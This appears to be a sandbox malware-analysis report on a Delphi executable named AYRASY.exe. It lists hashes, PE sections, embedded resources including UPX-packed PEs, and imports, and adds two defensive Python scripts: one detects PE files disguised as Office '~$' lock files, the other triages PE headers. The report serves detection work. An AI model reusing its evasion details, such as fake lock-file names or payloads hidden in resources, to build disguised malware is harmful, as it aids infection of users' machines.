                                                                                                                            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Z.................................................................................................................................................................................................................................................................................................................................................5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
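The dropped-file records above give a concrete hunting lead: Synaptics.exe wrote a 771,584-byte Delphi PE (SHA-256 8445CFA3...) to C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, i.e. under a name that mimics an Office owner file, while the genuine "~$" record written by EXCEL.EXE is 165 bytes and holds nothing but a user name. The sweep below is an added example written for this page, not Joe Sandbox code: it classifies files by leading bytes instead of by name, flags any "~$" file that is actually a PE, and matches SHA-256 values copied from the records above. The directory tree built by run_demo() is constructed for the demonstration; the 771 KB/165-byte sizes, the GAOBCVIQIJ folder name and the hashes are the only values taken from the report.

```python
"""Sweep a Documents tree for PE files posing as Office owner (lock) files.

Added example for this report, not Joe Sandbox code.  The dropped-file
records show Synaptics.exe writing a Delphi PE to Documents\GAOBCVIQIJ\~$cache1,
whereas a real "~$" file written by Excel is a short owner record.
"""
import hashlib
import os
import tempfile

# SHA-256 values copied from the dropped-file records in this report.
KNOWN_BAD_SHA256 = {
    "8445cfa3304bbc48a8616aaba0881a2433e52b839dd5e6234df8776ae7873c26": "XRed Delphi PE dropped as ~$cache1",
    "8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15": "Excel 2007+ file written by Synaptics.exe",
}
DELPHI_STUB_MSG = b"This program must be run under Win32"   # Borland/Delphi DOS stub text seen in the previews


def classify(data: bytes) -> str:
    """Label a file by its leading bytes rather than by its name or extension."""
    if data[:2] == b"MZ":
        if data[:3] == b"MZP" or DELPHI_STUB_MSG in data[:0x100]:
            return "pe-delphi"
        return "pe"
    if data[:2] == b"PK":
        return "ooxml-or-zip"            # .xlsx/.docx containers start with the zip signature
    # Office owner file: length byte, ANSI user name, then the name again in UTF-16LE.
    if 2 < len(data) <= 256:
        n = data[0]
        if 0 < n < 54 and all(0x20 <= b < 0x7F for b in data[1:1 + n]):
            return "office-owner-file"
    return "other"


def sweep(root: str) -> list:
    """Walk root; flag any '~$' file whose content is a PE, and match known-bad hashes."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            with open(os.path.join(dirpath, name), "rb") as fh:
                data = fh.read()
            kind = classify(data)
            digest = hashlib.sha256(data).hexdigest()
            findings.append({
                "name": name,
                "kind": kind,
                "size": len(data),
                "sha256": digest,
                "ioc": KNOWN_BAD_SHA256.get(digest),
                "suspicious": (name.startswith("~$") and kind.startswith("pe"))
                              or digest in KNOWN_BAD_SHA256,
            })
    return findings


def run_demo() -> list:
    """Build a constructed Documents tree (not the report's files) and sweep it."""
    owner_file = bytes([4]) + b"user".ljust(53, b" ") + bytes([8]) + "engineer".encode("utf-16-le")
    fake_lock = (b"MZP" + b"\0" * 0x3D + DELPHI_STUB_MSG + b"\r\n$").ljust(0x400, b"\0")
    workbook = b"PK\x03\x04" + b"\0" * 64
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "GAOBCVIQIJ"))       # folder name taken from the report
        for rel, content in [(os.path.join("GAOBCVIQIJ", "~$cache1"), fake_lock),
                             ("~$Budget.xlsx", owner_file), ("Budget.xlsx", workbook)]:
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(content)
        return sweep(root)


if __name__ == "__main__":
    for f in run_demo():
        print("%-16s %-18s %6d bytes  suspicious=%s  ioc=%s"
              % (f["name"], f["kind"], f["size"], f["suspicious"], f["ioc"]))
```

Pointing sweep() at a real profile's Documents folder is the intended use; the hash match will only fire on the exact files from this report, so the content-based "~$ file that is a PE" rule is the part that generalises to re-packed samples of the same family.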
                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):7.48957166237222
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                            • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                            • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                            • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                            File name:AYRASY.exe
                                                                                                                            File size:1'750'016 bytes
                                                                                                                            MD5:07e25c260c13b82cd867daef02255c82
                                                                                                                            SHA1:ebc6562d3eb2a877d8cfeafcada1e1af1a66e208
                                                                                                                            SHA256:72d043dcd766da3f32477c3c1612165b2124f347013bbb69ba3da85eaf9e3d40
                                                                                                                            SHA512:dcf874250b8b302fff6ba5466b240660d06613838bc24ff76ab8f060ad8fb6ddbdfd58548034d08ab43906dd4b0f91a3ad2f31fe298dc20005f8a0a48873afd9
                                                                                                                            SSDEEP:49152:jnsHyjtk2MYC5GDIhloJfEEaiSgCkqoHisJ:jnsmtk2athlVER3CkqoHxJ
                                                                                                                            TLSH:E485D032F6D1A477D1321A3D9C5BA3A8482DBF512D34794E3BF82E5C9F7A28129142D3
                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                            Icon Hash:170105b232472f1f
                                                                                                                            Entrypoint:0x49ab80
                                                                                                                            Entrypoint Section:CODE
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                            DLL Characteristics:
                                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                            Instruction
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            add esp, FFFFFFF0h
                                                                                                                            mov eax, 0049A778h
                                                                                                                            call 00007F2828A708BDh
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            call 00007F2828AC4205h
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            mov edx, 0049ABE0h
                                                                                                                            call 00007F2828AC3E04h
                                                                                                                            mov ecx, dword ptr [0049DBDCh]
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            mov edx, dword ptr [00496590h]
                                                                                                                            call 00007F2828AC41F4h
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            call 00007F2828AC4268h
                                                                                                                            call 00007F2828A6E39Bh
                                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x100b30 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x100b30 | 0x100c00 | 694ea87e8264448e1db3a3657c5b4e19 | False | 0.8911432342380721 | data | 7.79577397473991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
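Three facts in the static tables above carry the triage signal: the Time Stamp 0x2A425E19 is the fixed value the Borland/Delphi linker writes into every binary (so "Jun 19 1992" is not a build date, it is a compiler fingerprint consistent with the Delphi 7 TrID match and the CODE/DATA/BSS section names); the entry point 0x49ab80 lies inside CODE, the only executable section; and the 1 MB .rsrc section has entropy 7.80, far above the 6.5 of the code itself, which is the usual shape of an embedded, compressed or encrypted payload (the dropped UPX-packed file shows the related UPX0/UPX1 section naming). The parser below is an added example written for this page, not Joe Sandbox code. It reads the DOS, COFF, optional and section headers, computes per-section MD5 and Shannon entropy like the table above, and raises the same flags. build_sample_pe() assembles a constructed PE32 image with that shape; it is not the real AYRASY.exe, and the 7.0 entropy threshold is a heuristic assumption.

```python
"""Minimal PE header/section triage (added example, not Joe Sandbox code).

Reproduces the checks a reviewer applies to the static tables: entry-point
section, the fixed Borland/Delphi link timestamp, UPX section names, and
per-section MD5/entropy.  build_sample_pe() is a constructed stand-in for
the report's sample, not the real file.
"""
import hashlib
import math
import struct

DELPHI_TIMESTAMP = 0x2A425E19          # fixed TimeDateStamp written by the Borland/Delphi linker
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_ENTROPY = 7.0                   # heuristic threshold (assumption); the report's .rsrc scores 7.80


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Parse DOS, COFF, optional and section headers; return fields plus triage flags."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                                   # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                 # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "md5": hashlib.md5(raw).hexdigest(),
                         "entropy": shannon_entropy(raw), "characteristics": sc})
    entry_section = next((s for s in sections
                          if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    flags = []
    if timestamp == DELPHI_TIMESTAMP:
        flags.append("delphi-timestamp")
    if any(s["name"] in UPX_SECTION_NAMES for s in sections):
        flags.append("upx-sections")
    if entry_section is None or not (entry_section["characteristics"] & IMAGE_SCN_MEM_EXECUTE):
        flags.append("entry-outside-executable-section")
    flags += ["high-entropy:" + s["name"] for s in sections if s["entropy"] > PACKED_ENTROPY]
    return {"machine": machine, "timestamp": timestamp, "characteristics": characteristics,
            "image_base": image_base, "entry_point": image_base + entry_rva,
            "entry_section": entry_section["name"] if entry_section else None,
            "sections": sections, "flags": flags}


def _pseudo_random(n: int, seed: bytes = b"pe-demo") -> bytes:
    """Deterministic high-entropy filler standing in for a packed payload."""
    out = bytearray()
    while len(out) < n:
        out += hashlib.sha256(seed + len(out).to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the real sample): Delphi stub, CODE, UPX1, high-entropy .rsrc."""
    code = (b"\x55\x8b\xec\x83\xc4\xf0" * 86)[:0x200]    # push ebp; mov ebp,esp; add esp,-10h ...
    sections = [(b"CODE", 0x1000, code, 0x60000020),
                (b"UPX1", 0x2000, _pseudo_random(0x200), 0xE0000040),
                (b".rsrc", 0x3000, _pseudo_random(0x1000, b"rsrc"), 0x40000040)]
    dos = (b"MZP" + b"\0" * 0x39 + struct.pack("<I", 0x80)
           + b"This program must be run under Win32\r\n$".ljust(0x40, b"\0"))
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), DELPHI_TIMESTAMP, 0, 0, 224, 0x818E)
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 2, 25, len(code), 0x1200, 0, 0x1100, 0x1000, 0x2000,
                      0x400000, 0x1000, 0x200).ljust(224, b"\0")
    headers, ptr, body = b"", 0x200, b""
    for name, va, raw, chars in sections:
        headers += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), ptr, 0, 0, 0, 0, chars)
        ptr += len(raw)
        body += raw
    return (dos + b"PE\0\0" + coff + opt + headers).ljust(0x200, b"\0") + body


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print("entry 0x%x in %s, timestamp 0x%x, flags %s"
          % (info["entry_point"], info["entry_section"], info["timestamp"], info["flags"]))
    for s in info["sections"]:
        print("%-8s va=0x%05x raw=0x%05x md5=%s entropy=%.2f"
              % (s["name"], s["va"], s["rawsize"], s["md5"], s["entropy"]))
```

Run against the real sample the same code should report the entry point in CODE, the Delphi timestamp flag and high-entropy:.rsrc; the entropy threshold is deliberately conservative, since genuine icon and bitmap resources such as those listed below sit well under 7.0.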
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.5145403377110694
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
                                                                                                                            RT_STRING0xb68940x320data0.45125
                                                                                                                            RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                            RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                            RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                            RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                            RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                            RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                            RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                            RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                            RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                            RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                            RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                            RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                            RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                            RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                            RT_RCDATA0xb8e040x10data1.5
                                                                                                                            RT_RCDATA0xb8e140xeee00PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.9195641597985348
                                                                                                                            RT_RCDATA0x1a7c140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                            RT_RCDATA0x1a7c180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                            RT_RCDATA0x1ab8180x64cdata0.5998759305210918
                                                                                                                            RT_RCDATA0x1abe640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                            RT_RCDATA0x1abfb80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                            RT_GROUP_CURSOR0x1b078c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                            RT_GROUP_CURSOR0x1b07a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                            RT_GROUP_CURSOR0x1b07b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b07c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b07dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b07f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b08040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_ICON0x1b08180x14dataTurkishTurkey1.1
                                                                                                                            RT_VERSION0x1b082c0x304dataTurkishTurkey0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
